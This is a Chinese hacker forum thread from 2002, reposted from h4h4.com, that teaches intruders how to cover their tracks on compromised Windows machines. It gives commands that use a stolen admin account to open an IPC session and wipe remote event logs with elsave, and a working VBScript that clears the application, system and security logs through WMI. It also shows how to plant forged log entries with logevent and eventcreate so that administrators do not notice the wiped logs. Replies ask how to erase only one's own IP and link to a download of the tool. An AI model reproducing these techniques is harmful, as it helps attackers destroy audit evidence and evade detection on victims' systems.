如何伪造日志

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

如何伪造日志

■ 回复数：5　◆ 点击数：295

将此页发给您的朋友

作者

主题: 如何伪造日志

回复 | 收藏 | 打印 | 篇末

永远的FLASH 帅哥哦

级别：刀光雪影版主
威望：3
经验：1
货币：5852
体力：

来源：江苏
总发帖数：2264
注册日期：2002-02-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

1。日至清除
原创：nightsinger 来源：http://www.h4h4.com

一个入侵系统成功后的黑客第一件事便是清除日志，如果以图形界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，可以在命令行下先停止，再删除，在m命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是很困难的，实际上不是这样，下面介绍几种方法:
1.借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件，使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use \\ip pass /user: user
然后命令行下：elsave -s \\ip -l application -C，这样就删除了安全日志。
其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。
2.利用脚本编程中的VMI，也可以实现删除日志，首先获得object对象，然后利用其clearEventLog() 方法删除日志。源代码：
cleanevent.vbs
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate,(Backup)}!\\" & _
strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
Set colLogFiles = objWMIService.ExecQuery _
("Select * from Win32_NTEventLogFile where LogFileName=''''"&logs&"''''")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
next
在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。
然后用一个for 循环,删除数组中的每一个元素,即各个日志.
2。创建日志：
删除日志后,任何一个有头脑的管理员面对空空的日志,马上就会反应过来被入侵了，所以一个聪明的黑客的学会如何
伪造日志：
1。利用脚本编程中的eventlog方法是创造日志变得非常简单；下面看一个代码
createlog.vbs
set ws=ws cript.createobject("Ws cript.shell")
ws.logevent 0 ,"write log success" ''''创建一个成功执行日志
这个代码很容易阅读，首先获得ws cript的一个shell对象，然后利用shell对象的logevent方法
logevent的用法：logevent eventtype,"des cription" [,remote system]
eventtype 为日志类型，可以使用的如下:0 代表成功执行，1 执行出错，2 警告， 4，信息，8 成功审计 16 故障审计
所以上面代码中，把0改为1,2,4,8,16均可，引号下的为日志描述。
这种方法写的日志有一个缺点，只能写到应用程序日志，而且日至来源只能为wsh,即windows s cripting host,所以不能起太多的隐蔽作用。
2，微软为了方便系统管理员和程序员，在xp下有个新的命令行工具，eventcreate.exe,利用它，创建日志更加简单。
eventcreate -s server -l logname -u username -p password -so source -t eventtype -id id -d des cription
含义：-s 为远程主机创建日志： -u 远程主机的用户名 -p 远程主机的用户密码
-l 日志；可以创建system和application 不能创建security日志，
-so 日志来源，可以是任何日志 -t 日志类型如information信息，error错误,warning 警告，
-d 日志描述，可以是任意语句 -id 自主日志为1-1000之内
例如，我们要本地创建一个系统日志，日至来源为admin,日志类型是警告,描述为"this is a test",事件ID为500
可以用如下参数
eventcreate -l system -so administrator -t warning -d "this is a test" -id 500
这个工具不能创建安全日志。至于如何创建安全日志，希望大家能够找到一个好方法！

----------------------------------------------------------
H4技术组：http://www.h4h4.com

编辑　

删除　

发表于 2002-11-18.23:14:56　

IP: 已记录

睡眼朦胧

级别：精灵
威望：0
经验：78
货币：745
体力：

来源：其它
总发帖数：297
注册日期：2002-08-22

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

不错,很好的文章

编辑　

删除　

发表于 2002-12-30.20:42:59　

IP: 已记录

sex

级别：侠客
威望：0
经验：12
货币：189
体力：

来源：四川
总发帖数：17
注册日期：2002-12-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

哪里有elsave.exe下载？

编辑　

删除　

发表于 2002-12-30.20:51:55　

IP: 已记录

清风飘雪

级别：骑士
威望：0
经验：6
货币：425
体力：

来源：其它
总发帖数：73
注册日期：2002-11-23

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

好！！！！

编辑　

删除　

发表于 2002-12-30.21:10:15　

IP: 已记录

小猪跑跑

级别：精灵
威望：-1
经验：2
货币：1345
体力：

来源：61.170.192.*
总发帖数：213
注册日期：2002-08-24

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

可以只删除我的那个ｉｐ的日志吗？？问了好久没有人知道这个

编辑　

删除　

发表于 2003-01-02.12:22:20　

IP: 已记录

剑侠

级别：圣骑士
威望：0
经验：6
货币：582
体力：

来源：江苏
总发帖数：135
注册日期：2002-01-29

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

http://coolice.hnit.aosee.com/elsave.exe

----------------------------------------------------------
网嗅技术

编辑　

删除　

发表于 2003-01-02.13:58:07　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP